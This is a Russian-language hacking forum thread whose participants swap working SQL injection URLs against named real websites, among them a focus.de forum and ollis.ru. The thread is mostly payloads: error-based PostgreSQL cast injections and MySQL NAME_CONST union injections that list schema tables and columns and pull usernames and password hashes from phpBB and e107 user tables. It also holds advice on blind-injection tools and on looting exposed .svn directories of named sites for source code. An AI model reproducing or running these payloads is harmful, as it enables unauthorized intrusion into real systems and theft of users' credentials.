Это PostgreSQL http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)--
таблицы норм выводится через limit offset но на колонки ругается пххп://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+information_schema.columns+where+table_name=chr(39)||pg_user||chr(39)+limit+1+offset+0)+as+int)--
имя таблицы лучше писать в сhr(), а не просто кавычки чарить, по аналогии с MySql, а у тебя гибрид какой-то конгениальный)
YuNi|[c, http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+table_name||chr(47)||column_name+from+information_schema.columns+where+column_name+like+chr(37)||chr(109)||chr(97)||chr(105)||chr(108)||chr(37)+limit+1+offset+6)+as+int) http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+username||chr(47)||user_password+from+phpbb_users2+limit+1+offset+1)+as+int)
спс но всетаки я немного не понял запрос. если например мне надо найти колонки с таблицы usage_privileges http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+table_name+from+information_schema.tables+limit+1+offset+3)+as+int)-- так какой будеть запрос?
Не пойму,при переборе колонок на 5 значение вылетает пустая страничка,как поступить ???? Сама sql http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4,5%23
bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+information_schema.columns+where+table_name=chr(117)||chr(115)||chr(97)||chr(103)||chr(101)||chr(95)||chr(112)||chr(114)||chr(105)||chr(118)||chr(105)||chr(108)||chr(101)||chr(103)||chr(101)||chr(115)+limit+1+offset+0)+as+int)-- http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
Нашол да одной социалке скулу, панголин сказал что это mysql 5 базы сказал,операционку,пользователя, но неможет подобрать таблицы, вернее их имена и колонки. Пробывал вручную но там blind sql injection. Как можно определить таблицы с базы и колнки таблиц? Кстате на ковычку ругается: PHP: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' order by auktionid DESC LIMIT 1' at line 1 Пробывал перекодировать но все равно ругается.
если там блинд юзай прогу toolza 1.0 от пашкела или marathon tools эти как раз для блинд скули удобно Кстати кто знает какой нит прогу encoder/decoder CHAR для mssql/postgresql/mysql ручками долго кодировать
Через NAME_CONST можно сделать вывод. Способ описывал QWAZAR. Либо через блинд по символу определять. Скинь ссылку в личку.
Извинит вопрос не по теме.Но все же задам.Кто нибудь может рассказать как можно получить исходники с помощью svn уязвимости нашел на http://www.wi-fi.org/.svn/entries и еще на kp.ru/.svn/entries может это что дать?В форуме есть по этой уязвимости посты но там не нашел нужной информации.Заранее спасибо,кто поможет!
aldonin, http://habrahabr.ru/blogs/infosecurity/70330/ Так что так. Поковыряй, может найдешь чего интересного http://www.wi-fi.org/.svn/text-base/info.php.svn-base http://kp.ru/.svn/text-base/autohandler.svn-base
Это я уже смотрел.А как они видели файловую структуру,такого не отображается почему-то?Пробывал через клиент но просит естественно пароль.Может там хеш валяется как нить полезный?=)
Делаю зарос http://www.ollis.ru/index.php?rest=1')%20union%20select%20*%20FROM%20(SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%20concat_ws(0x3a,user_loginname,user_password)%20FROM%20e107.e107_user%20LIMIT%201),%2014)d)%20as%20t%20%20JOIN%20(SELECT%20NAME_CONST((SELECT%20concat_ws(0x3a,user_loginname,user_password)%20FROM%20e107.e107_user%20LIMIT%201),%2014)e)%20b)a%23 выводит только логин , как найти пароль?
